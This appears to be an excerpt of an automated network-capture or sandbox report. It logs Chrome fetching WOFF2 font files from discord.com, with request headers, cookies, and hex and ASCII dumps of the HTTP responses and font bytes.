                                                                          2023-12-10 16:45:26 UTC961INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 66 6f 6e 74 2f 77 6f 66 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 38 31 35 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 66 32 65 37 39 64 61 37 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: font/woff2Content-Length: 38156Connection: closeCF-Ray: 8336f54f2e79da73-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Con
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 00 95 0c 00 11 00 00 00 01 7c 54 00 00 94 a6 00 02 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 04 1b 81 a6 0c 1c a0 20 06 60 00 8e 50 08 82 3c 09 8d 57 11 0c 0a 83 9a 38 82 dd 7d 01 36 02 24 03 99 60 0b 8c 72 00 04 20 05 93 6e 07 b4 46 0c 82 76 5b 7f 56 71 04 dd b6 1d 51 a9 72 db 00 18 92 af d7 92 39 1c c0 9d 2f 68 e8 cd d2 c6 89 72 7e a0 84 79 d6 e7 80 da 29 4a 76 f6 8d 5f 40 f6 ff ff 7f 5a 82 7f 19 63 6d 9f 7a 1b 28 88 a9 da 75 86 0a 23 45 4d 4b 4b 17 8d 65 ad 6d 6d 0b e9 32 2c c9 46 4b df c2 e8 59 eb 10 6d 6b 5d cd ba 7b ac e7 eb 5b f1 5e 55 52 87 c3 01 1e ab 1f 38 70 e3 ac 6a 44 a8 6e b8 74 97 bc 6b 09 8a 0d d8 dc 62 21 9a 43 e0 10 b8 26 38 f4 fe 91 b3 5f b6 2d 6e 36 39 28 06 09 c5 b1 4e f5 84 04
                                                                          Data Ascii: wOF2|TB `P<W8}6$`r nFv[VqQr9/hr~y)Jv_@Zcmz(u#EMKKemm2,FKYmk]{[^UR8pjDntkb!C&8_-n69(N
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: cb f3 33 1e 86 da 03 8d 1c c4 19 cf 35 de 45 2e 3a 63 5c 7e e1 86 c1 25 f9 85 13 c4 17 84 c1 f9 7e 53 8b 3a f9 51 8a 17 e5 8d b7 5d ab 84 ae c2 8e 7d 06 53 34 99 6b ba de 10 2a 6d f4 8c 8e d9 8f 9f 4e 1b e0 3f e6 f6 28 93 7c 89 4a 70 8a de dd 87 cc 8e 35 dd 52 63 29 a0 c6 55 95 e8 fb a9 62 95 15 92 09 34 e1 7f 42 99 db 4b bd 94 8a 04 8d 02 03 88 c5 32 01 08 07 ca ad f8 ef 57 f7 a2 97 39 6c 08 12 1e 22 83 88 8c df 86 3d b9 6f 06 e2 1e 77 08 b2 48 b0 22 d6 0e 32 88 58 91 ec ef 71 85 8f bd 7d 27 6a 4f 72 6b a5 77 7f ac 52 42 09 c1 18 63 84 78 88 87 10 46 7f 95 c8 e9 68 bb cd 0e 8f 04 71 92 23 64 10 fe 3b 8b fe 9d 5b 8b f5 93 c5 28 23 a2 44 69 25 a2 45 1b 63 16 df 5f c6 b4 ff 06 12 10 47 2b 46 e5 2a 5a 40 04 df 9f f3 cf 9f ce c7 e8 4e 5b 07 97 2a 63 05 48 4a
                                                                          Data Ascii: 35E.:c\~%~S:Q]}S4k*mN?(|Jp5Rc)Ub4BK2W9l"=owH"2Xq}'jOrkwRBcxFhq#d;[(#Di%Ec_G+F*Z@N[*cHJ
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 15 d4 24 a5 cb a3 97 58 57 dd 24 f4 83 df 5b 5b 53 b1 85 1e b7 b3 d6 d6 33 e3 6a 96 2f da f3 62 34 83 ff 2e e6 9b bd c9 ba 68 f5 9d e0 d9 ff 3f a7 5a ea 26 2f 5a aa 9e b3 0e 9a dc e7 4e 8b d0 57 0f 1b ca 15 b9 93 00 49 c2 80 6b f5 2c bd 37 39 75 da dc e5 f0 2b a1 3b 9d 1c 48 e3 b4 97 7a a6 f3 e5 fa 16 9c 24 4b cc 0d 6e b0 67 da 62 06 dd cb ad 2a 91 bb 45 d1 1a c5 a3 2c 16 3d d4 44 04 4d 5d 24 9a 26 eb 91 f1 68 c3 a6 ca ae f6 58 d9 f2 03 ab 58 93 fe 4e 6b 3b d3 26 2d 80 be 2e 1d e5 ad ce f7 63 e5 7e 4d 75 a7 4f ee ec 93 7b d8 76 b7 3a a5 ef 9f a6 f1 99 a1 24 b9 9b af 0e 98 a1 91 84 af 37 b8 b3 71 a5 8e b3 2a 5d 8e 63 51 6a f1 b0 56 53 8e 55 56 ea e6 94 f4 7f 6b 6f 5a ee ae 59 4e 31 7b d5 74 ce 9a b5 d9 38 27 2e 0e 7d 80 72 e7 64 d3 e7 d0 cd ad 7c 00 6b 9a
                                                                          Data Ascii: $XW$[[S3j/b4.h?Z&/ZNWIk,79u+;Hz$Kngb*E,=DM]$&hXXNk;&-.c~MuO{v:$7q*]cQjVSUVkoZYN1{t8'.}rd|k
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: c7 cb ec 44 59 31 3b 15 ab 9c 72 cb 2b bf 82 8a e2 de 2a 2a db 85 ff 57 d5 d9 f8 94 ac 35 df 25 2a 9b 75 d7 73 61 5f 17 82 ea 27 20 6c 65 db 35 9d f8 e6 50 d8 ca 36 fb b0 47 3d 2e db 89 e7 bd 68 d9 85 c3 b0 76 bd 1f 40 7c 00 d4 f7 80 7e 4c e0 20 57 08 c0 c4 07 68 fe 80 69 ef 09 42 6b b0 40 2b 9f 1b bd d5 e7 da 8f e9 55 6e 27 09 60 2b be 55 cb 19 ee b6 d7 5f 11 e7 90 c4 65 e7 93 bf e1 26 0d 1d 12 a3 91 89 ae 52 01 dc e4 b5 d8 32 43 d8 9c f3 d6 b9 01 cb 01 5d 99 a9 6e ea ad 5c 2d 38 39 02 5b d1 df 71 16 96 fc 38 28 54 a0 71 9a e2 c5 e7 93 85 70 fd 38 b5 ac 77 a1 1a 5f 66 fd 6a ad e6 0c f1 c2 59 81 de 97 46 42 44 23 a2 12 6a 33 ca b3 6b 90 a3 31 e8 01 c7 70 b0 10 ac 9c 1c c0 73 0a 50 a7 82 d8 69 20 72 3a a0 33 80 b3 08 04 16 03 63 09 f0 2d 05 62 59 1f de 08
                                                                          Data Ascii: DY1;r+**W5%*usa_' le5P6G=.hv@|~L WhiBk@+Un'`+U_e&R2C]n\-89[q8(Tqp8w_fjYFBD#j3k1psPi r:3c-bY
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 4c 41 a9 04 40 f4 f2 81 83 f8 5f 8e fc f5 9f 8d c9 91 04 30 a6 a8 20 7a ad a2 47 f3 f7 c5 41 82 70 a8 4e 5d 1e bd 2f 9f 0f 7a ab 30 72 13 6a 0a 9c 2c 70 00 1a 85 b5 8a 9a 12 61 34 32 3c 55 bf 3a a7 68 96 40 ca c1 13 61 73 02 cc 02 24 a7 08 46 2e 27 35 7e 8a ed 8b 5e 68 ac 09 38 6d 5e 25 34 28 ae 88 46 46 93 88 d2 28 65 08 11 0c 53 ec 71 1c f4 81 ec d1 b8 fd 46 4d c0 0f 2e 0f 7a 48 f9 24 82 e7 14 f7 28 29 e4 c8 19 c3 08 83 31 80 30 18 f1 23 6e c6 17 f9 47 d3 43 48 4c 71 7f 63 ef ed 18 29 3d 5c 41 ad 4b 62 bb 71 d9 f3 48 d8 7e b3 2b 4f f1 54 79 e6 d9 c0 21 e0 98 5f 4a 50 7c c6 bd 72 db 41 85 cd 55 79 f3 ad 60 c3 66 96 77 de 7f e7 83 4f 81 73 5e fa a2 2f 61 f8 40 a8 a8 9f 86 2f be ee 3b 12 44 70 2a d4 9d e5 2f 61 8b d2 b9 c8 1a 65 34 50 18 2c 0e 8b 39 f7 aa
                                                                          Data Ascii: LA@_0 zGApN]/z0rj,pa42<U:h@as$F.'5~^h8m^%4(FF(eSqFM.zH$()10#nGCHLqc)=\AKbqH~+OTy!_JP|rAUy`fwOs^/a@/;Dp*/ae4P,9
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: f7 86 0a cb 4e 7f af 20 7b 72 81 57 2f ff 2c a2 e8 de d9 44 ba 65 c1 e2 56 03 dc 2e 82 91 29 9a 86 93 28 ef c1 6f 22 f7 52 5b 59 c3 e8 14 f5 c4 80 dc 04 e5 03 dd 7a 70 23 1e 62 dc 84 64 d5 9b f1 49 f4 d0 7b 7e a7 89 42 68 2b e1 11 b8 47 81 d8 e6 ef fa f1 6a bb fe 46 38 20 8d 36 38 16 ed 15 11 64 38 34 3b 45 51 e1 d4 1b 0c d7 12 00 f2 99 c1 cd 59 53 89 9c 75 34 04 22 0c 4c 97 46 a5 43 88 ea 95 30 22 06 f2 50 e9 d8 54 e2 f6 ae 39 fd 2a b6 f7 ae 42 85 e2 82 90 fc 14 69 1f cf b3 29 43 0e 08 ce 43 8d 2b 30 fa f3 c6 9a 6e 84 22 27 4c f6 ca 0d 8f 2c a3 0c 2a 07 e9 1c 45 d5 f7 31 39 39 56 79 9c 59 51 c5 5c 34 0a 0b ea 65 a0 a4 2b 73 05 57 69 c2 8d ef df 5c 63 4d dc 1a 5c 34 ee d8 82 bb d4 a6 7b c7 9f dc 1f 5e 34 ea fe 11 e1 c9 2f 37 9e 0c 65 e1 29 42 2c a7 eb 6d
                                                                          Data Ascii: N {rW/,DeV.)(o"R[Yzp#bdI{~Bh+GjF8 68d84;EQYSu4"LFC0"PT9*Bi)CC+0n"'L,*E199VyYQ\4e+sWi\cM\4{^4/7e)B,m
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: a2 0c 1b 87 c5 9f 63 51 77 2e 27 c9 4f 0f 6e a2 57 f6 3d 30 b4 a0 5c 04 bb 25 47 44 b2 dc bd 02 aa 07 31 5d 64 94 cc 0a 56 0a 02 ec ef 2a 32 d6 ae 00 e6 c7 08 b9 db 55 2f 3e 0e 79 28 8e 7c 68 9c 55 55 5a c5 c7 a7 4f 3b 32 c8 83 f2 03 35 03 e7 9d 73 6b 32 90 97 56 e3 5d f5 15 5f 43 ca 69 84 eb b8 fb 3a 45 71 ee 3f a8 e8 ee af 00 a8 96 53 ea 0c 09 df 63 d1 33 38 c7 cb 40 c5 f1 05 40 44 d6 bc b3 4f 1f f6 ef 3c 21 1e 05 a1 0c 54 5e 3c 0a ca 83 32 a8 bd f2 1b f1 6d d7 84 7c c2 1a 72 d8 40 70 d3 32 b2 cc e3 d5 d7 40 41 df 35 98 39 ec 5d 0e fb d4 ca 07 c2 56 20 e5 78 83 3a 8b e6 c3 d8 9b a9 59 1c 5f 9e 5d ea 79 5b 23 46 af 3d a0 00 37 e0 3b ae 7f aa 39 cd 01 49 80 06 18 80 55 51 5c 2a 55 35 dc bc e2 be 06 1a eb 22 df df 05 33 05 bd 28 b2 6e 55 6a b0 a4 70 5a 56
                                                                          Data Ascii: cQw.'OnW=0\%GD1]dV*2U/>y(|hUUZO;25sk2V]_Ci:Eq?Sc38@@DO<!T^<2m|r@p2@A59]V x:Y_]y[#F=7;9IUQ\*U5"3(nUjpZV
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: b3 f0 5c a2 c0 2e 1b 3c 3d 77 5f ea 45 bb 6d b4 64 f7 65 0a ed b1 c9 33 bb 2f f7 92 e7 6c 96 b3 7b 85 03 f6 da e2 7f bb af f0 b2 e7 6d 95 bb fb 4a 45 f6 d9 26 af 74 95 83 5e b0 dd d2 c7 ed c6 87 84 ec b0 0c d6 c5 f6 db 69 bd 6c 8b 21 d0 2e d2 4e 6b c2 5d fd 4e 64 20 f2 0e 75 b2 c2 27 61 f1 29 d8 9e de e7 ca 93 82 06 9e 88 35 c7 cd f8 5b 20 46 b4 59 fb b3 f4 6c 18 f6 73 7a cb 01 e3 4f 0b ed 8d e7 c8 8e 63 fb 69 af 96 ee b2 db 1e cf 2d 23 d8 df ef 62 a7 8f 93 96 ce c1 8f e9 90 0a e7 c6 25 99 dd b1 b1 18 63 40 b4 f6 b6 36 91 b9 c3 1a 95 48 cd 5b 87 90 d6 4e 12 0e 29 2a 3b 48 86 ec 21 c5 e6 00 29 11 04 d3 95 1c 71 27 91 d4 8e 84 52 92 49 c5 87 dc 71 ee 44 57 82 0f cc 37 e6 0e 93 b4 27 cb 00 fa dc 28 00 a7 6c b1 dc 11 8d 08 80 6f 96 3f fe 5c 32 36 7d fc 6b 96
                                                                          Data Ascii: \.<=w_Emde3/l{mJE&t^il!.Nk]Nd u'a)5[ FYlszOci-#b%c@6H[N)*;H!)q'RIqDW7'(lo?\26}k
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 8f cc c2 7c 59 9c 3f 4b 0a 60 69 81 2c ca 8f 6d 25 b0 b5 78 b6 97 c8 8e 92 fc e8 27 df fa de 0f be cb 3c 0b ef 8e 69 a6 61 da 9d 46 9a 69 a5 1d 18 32 54 e8 54 82 61 0b ac b6 85 08 88 5f 7a 2d 21 69 3f bb d7 da 47 01 de 14 5a ba fd 1f 0b 5e ca c7 f8 3e 0c f2 c3 3c 86 1f 18 f7 be 59 42 3f 82 59 c2 f7 8c c7 e9 4b f2 a4 f2 c3 ba 9d aa 7c 80 6c fd 59 6d f2 01 e6 76 65 4f 3e 71 77 e0 1f 98 72 9e 99 45 0d 82 3f be 6b 73 e4 b5 01 2d a8 b6 b2 a2 bc cc e7 2d 2d 71 39 8b 1c 76 9b d5 62 36 19 0d 7a 4c a7 d5 00 b5 4a 89 2a e4 32 04 86 a4 12 b1 48 c8 e5 b0 59 34 bb cc f7 8e c3 b1 a3 e3 c3 03 fd 7d 3d 5d 9d 1d ed bf e3 d0 6a 02 12 cd d0 d7 58 f2 a1 5c 3e 63 0f 42 4a dd 53 38 d1 d8 30 47 12 0e 9d ae 0f 73 b0 35 e1 3f 50 a3 85 7b 78 16 ed 67 b7 c9 6d a7 b2 1c 24 ad 9f 60
                                                                          Data Ascii: |Y?K`i,m%x'<iaFi2TTa_z-!i?GZ^><YB?YK|lYmveO>qwrE?ks---q9vb6zLJ*2HY4}=]jX\>cBJS80Gs5?P{xgm$`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          388192.168.2.550126162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:26 UTC1016OUTGET /assets/3f46bbecb4287c0a829f.woff2 HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://discord.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=sM3CcK_Ls.KLz5RX5asA1UG2Y9ys.WepQPYhcwtAneI-1702226725746-0-604800000
                                                                          2023-12-10 16:45:26 UTC959INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 66 6f 6e 74 2f 77 6f 66 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 39 37 32 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 66 61 63 37 38 64 61 30 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: font/woff2Content-Length: 39724Connection: closeCF-Ray: 8336f54fac78da05-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Con
                                                                          2023-12-10 16:45:26 UTC410INData Raw: 77 4f 46 32 00 01 00 00 00 00 9b 2c 00 11 00 00 00 01 7c 50 00 00 9a c6 00 02 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 04 1b 81 9a 02 1c a0 20 06 60 00 8e 50 08 82 40 09 8d 57 11 0c 0a 83 a6 04 82 e9 3c 01 36 02 24 03 99 60 0b 8c 72 00 04 20 05 93 3c 07 b4 46 0c 83 60 5b 70 56 71 85 9a 77 ff 53 49 86 ba 2b 9e 53 7f 66 3b 64 53 c3 b6 69 f1 b3 9e ab 20 43 d4 b7 62 6a d8 36 8d 88 77 3b 80 2f d5 fe e1 b2 ff ff ff 4f 4d 26 cf b8 bf 5b b9 6d 6f 2d a1 c0 c7 87 0c 8f 88 34 46 60 04 0f 84 53 65 52 f8 58 7a 50 ae 67 0f ac 6a 0a b9 4c f5 96 a2 0b a2 53 18 54 28 61 c5 15 79 a3 44 90 d3 06 6f 64 bb 2f 29 e3 02 f7 d8 e1 7c 6c f7 1d 0f 7a 6e f4 d2 91 ef a0 54 d0 e2 bc 92 4f 70 5a 50 08 bc b0 b3 63 5c 8c f2 c3 da 25 92 48 96 cb ba 79 04 09
                                                                          Data Ascii: wOF2,|PB `P@W<6$`r <F`[pVqwSI+Sf;dSi Cbj6w;/OM&[mo-4F`SeRXzPgjLST(ayDod/)|lznTOpZPc\%Hy
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 88 28 31 ad 6a 65 8b 23 ae 7e 5f a8 88 df fc ff ea 9a 85 13 21 d7 85 e4 99 f9 37 13 65 7f 9e e6 f4 fd ff cf 73 b9 5c 84 60 47 d0 5e b3 15 af 68 d2 42 b2 04 93 09 74 52 a3 4e d5 c0 2b 22 78 55 81 0e e6 ca a8 33 aa 46 7d 30 f8 ff df cd 7a f7 bd 90 40 5e 92 06 69 42 5e 0a 13 b4 0e 75 26 1d ab 0f 9d b3 5f 7b 98 24 5d 0e ab 8c 88 af 98 fe b9 7f 8a 38 6b c6 9a 8c 18 fc 3f ff 63 cf ff e6 5e e7 7e 15 a0 fd 41 32 cd d6 18 54 95 24 16 69 10 09 9d fa 13 59 63 78 21 62 7e 06 78 bb fd bb 33 3a 67 ee 5b ce ba 21 c9 58 95 ce b8 b3 66 67 74 ec 64 75 66 12 92 cc fb 92 75 5a 57 21 d9 19 97 8c 79 f9 c6 aa 28 5d d6 8f 24 d9 49 66 5f fc 9f cd f6 67 36 39 b7 45 66 de 27 7b e2 98 6e 64 43 0e d3 59 74 36 f1 ee 2a c4 3b ee 0d 5c 05 15 4d f5 17 0d dd 15 0d 45 27 da 5e 49 cb dc fb
                                                                          Data Ascii: (1je#~_!7es\`G^hBtRN+"xU3F}0z@^iB^u&_{$]8k?c^~A2T$iYcx!b~x3:g[!XfgtdufuZW!y(]$If_g69Ef'{ndCYt6*;\ME'^I
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 35 9e 3c 93 28 2a 8d a5 65 b0 b6 1c 36 54 c0 e6 1e 79 3b 43 20 cb 04 b2 5a 87 3d 95 73 a0 1a 8e f6 8a da 9a a9 af 8d 86 3a bd cf 11 c8 ef 05 f2 27 1d 7e ed 1d 7f 34 ce df 7d e4 72 73 5c ed 3b 77 5a e3 61 db 3c 6f d7 7b 85 00 df e8 d0 de 91 d2 d9 b1 5a 40 16 90 88 84 5c 42 18 4a 14 73 49 e0 55 52 28 25 87 a5 60 04 15 9e a8 d2 f0 fa f2 67 86 80 00 16 e8 85 05 72 f6 b9 56 4e 20 ce 51 f7 8e 08 01 41 72 6f 1c 15 06 8a 42 88 3d 16 74 86 1b 49 c8 1c 58 94 a2 16 6d 42 6e eb 1f 11 06 4a 04 e3 47 65 dc a0 b4 6a 70 e8 88 f3 4e f4 0d e0 73 d0 99 e7 39 20 80 f3 28 80 70 31 94 5a 4a d7 ea b7 30 a5 7b a5 47 a5 b6 cd 2f c1 70 10 fe 6b 64 31 d7 2b 39 37 bf e2 34 ef 34 ce 5a d3 c9 38 50 94 47 07 fe 33 ae 63 8a 00 41 1c 67 38 09 b1 b3 1c 04 71 d1 45 37 c1 5d 62 6b 25 ba 57
                                                                          Data Ascii: 5<(*e6Ty;C Z=s:'~4}rs\;wZa<o{Z@\BJsIUR(%`grVN QAroB=tIXmBnJGejpNs9 (p1ZJ0{G/pkd1+9744Z8PG3cAg8qE7]bk%W
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: b4 ab 91 cf 4a 3f 49 a2 dc c9 12 52 a2 73 ea 97 fa a7 eb 09 fa 76 e7 b0 16 9e 3a 0e 2a 65 1e fb 8d 19 d1 6c 32 42 8b d3 e1 1c d3 5e ae 46 2a d2 7d d6 ec 4b e7 4b 32 87 13 da 24 9d 1c b1 c2 8c 5e 99 8e 9c b7 15 7c d5 af a7 38 79 45 a6 9c fe cc a6 74 13 a2 e2 65 5e 1d f9 5b 8a 78 70 6e 30 e9 6f cd 9f 9a 03 29 4c 7d 5c 11 b8 51 fa 2a 8d 1f 10 92 de 6c 0d 25 73 1d 39 7d 5b 60 83 c1 eb 8d aa 91 7e 64 4e 5e da ab c6 70 56 54 5a 8f a6 eb 67 e3 90 d4 ea 37 56 83 f6 7f 5e 76 82 9d b3 ef 3d 1d 46 57 96 ec 48 e5 e5 fa b2 7a f7 04 bf 1b 83 73 98 4e 1f 8d 9a 0a 34 bb 3d 35 d4 b0 dd 12 fc e1 a1 13 94 8a 9f ee ca ab c6 5e 5d 6f c3 ac 00 3c b0 6a 03 76 93 c9 d8 ca 1a 59 28 56 3a 54 82 e0 d2 51 ee ac c0 5f 81 7b 83 50 b0 86 61 0a c8 3b da 21 dd 31 bf ab f3 31 0d dd 4a 9d
                                                                          Data Ascii: J?IRsv:*el2B^F*}KK2$^|8yEte^[xpn0o)L}\Q*l%s9}[`~dN^pVTZg7V^v=FWHzsN4=5^]o<jvY(V:TQ_{Pa;!11J
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 32 47 bb 47 65 0b 90 f3 48 43 24 c1 da 40 e7 10 bf 6c 22 40 43 a6 05 56 6d 51 97 cc 42 6a 42 53 d9 c9 ba e5 a0 3f b1 ac 4d ed a0 97 8d c0 b0 18 53 2e 04 69 5f ee 04 5f 42 04 29 85 8c 58 1c 2b fe 53 7d 40 0b 25 b6 98 6d 30 0c 6f 8a 42 dc 12 56 ec c0 04 d9 29 a2 ec e9 a7 20 51 15 53 2b e2 9b 11 60 93 31 ad 17 8e c5 a4 6d 4d 24 26 67 c3 8c 44 22 68 c8 d9 dd c6 30 a4 3a 12 ed c2 12 7e 24 14 55 cb 6a 8c 9f 29 63 4b 8f e6 15 c4 58 a6 f6 58 a9 7c df 77 ec e1 20 3b 02 b8 9d d1 af 74 4d 06 66 fb 54 b6 bb f0 3c dc 44 6a 91 34 ad 7e c9 4c 46 20 cc 14 2d c8 0a 0e 6c 97 70 c1 34 e6 f7 cd 62 1e 1f f0 29 0f 16 1f df 45 90 12 15 49 36 8d 6c 5f 4e cc e8 91 15 1f 15 fc e1 8f 50 c9 90 52 5c d3 0e 63 14 e3 4e ad 14 d3 44 45 49 5f 21 d6 21 8a 51 bc 92 95 b1 8d 5b bf a5 6c 15
                                                                          Data Ascii: 2GGeHC$@l"@CVmQBjBS?MS.i__B)X+S}@%m0oBV) QS+`1mM$&gD"h0:~$Uj)cKXX|w ;tMfT<Dj4~LF -lp4b)EI6l_NPR\cNDEI_!!Q[l
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 80 0a 81 01 5f 2e 3d 05 59 08 41 c0 bd d2 8c b9 7e a8 81 96 7f 68 8a ea 8b aa 01 9d e2 e9 be c4 3d 04 6e 6e b9 94 06 d2 98 49 d7 5a ea 3c 9d 27 13 b2 48 ec 2c 3d 66 92 8f 08 ec f4 44 61 22 2a ab a4 b4 71 09 69 c8 42 1e aa e8 69 71 e9 b0 07 35 d4 a3 03 4d 18 b4 ef ca a2 9e 5d de 6a 1d 37 5a ee 84 88 53 13 73 6b 1d 03 4d d3 7c 7e a9 09 4e 6b 3c 3a 82 b6 e5 81 69 45 64 80 a6 10 52 99 9d 18 a5 47 00 24 3e 0d b9 1a a3 04 35 ab 22 42 f3 3a 6f ef 1d 21 5e 41 df 1a 95 b3 08 a2 f9 b6 60 72 17 66 a5 e2 c9 aa ea 30 32 26 4b b3 be a5 24 e1 e7 74 9b 2a 70 9e e5 20 c6 57 1d c9 c8 20 53 26 54 62 b2 fe d0 17 93 0a 8f 6c 81 14 67 f4 67 d7 44 d1 7e 69 05 76 3a 60 81 07 82 61 51 36 17 5d a5 81 6a 88 99 b4 58 7a 8c ca f5 4e c7 c9 09 27 a6 03 e8 2c 8d d8 5e 30 db d1 5b 34 16
                                                                          Data Ascii: _.=YA~h=nnIZ<'H,=fDa"*qiBiq5M]j7ZSskM|~Nk<:iEdRG$>5"B:o!^A`rf02&K$t*p W S&TblggD~iv:`aQ6]jXzN',^0[4
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 4b 89 59 3d 19 2b 80 73 e4 77 87 b5 b8 f2 a3 fb 09 52 4e ee 7a cb b2 f6 f5 0d 87 7e 66 49 1c c2 e3 39 4c 1e c2 e4 12 10 4b 36 fe 3b 29 f0 50 8f 71 39 04 50 22 87 7a 8e 56 66 46 a6 ba 7b c1 86 7a 79 1a 6b 8a 6a 23 4a 63 06 b5 62 42 2e 27 ba d3 53 b2 47 16 e5 33 53 1e c2 cb 50 2e 75 f0 a4 a6 2a 3c 6a ce c1 53 1b 54 74 4a ee 81 ea 80 2a 71 d0 e2 c5 53 3a 94 c4 a9 5b 58 72 f7 ca 1e fb c8 2c 99 e3 30 5d d3 55 69 12 d3 ee 94 1e 98 6a 28 c0 5a 9b 08 1c 2e e6 ac a9 d6 13 ca 89 4b 66 0d 80 9a 74 d1 f0 94 27 14 8f 05 aa 8a 90 78 3d 32 c7 aa 57 26 bc 6a be 80 52 e5 23 9a b6 12 de 00 16 c8 66 f9 e4 0d c0 ee 76 13 1c 14 2c 1d 7f 05 3c b5 35 4d 87 cb 69 5a ac 32 0f d2 7d 81 19 65 2a 1b 0d aa b5 12 b4 9c 78 85 ea 3e 6e 5c 73 e8 54 9d ef e0 ce 59 76 6d 11 54 9e 87 76 0c
                                                                          Data Ascii: KY=+swRNz~fI9LK6;)Pq9P"zVfF{zykj#JcbB.'SG3SP.u*<jSTtJ*qS:[Xr,0]Uij(Z.Kft'x=2W&jR#fv,<5MiZ2}e*x>n\sTYvmTv
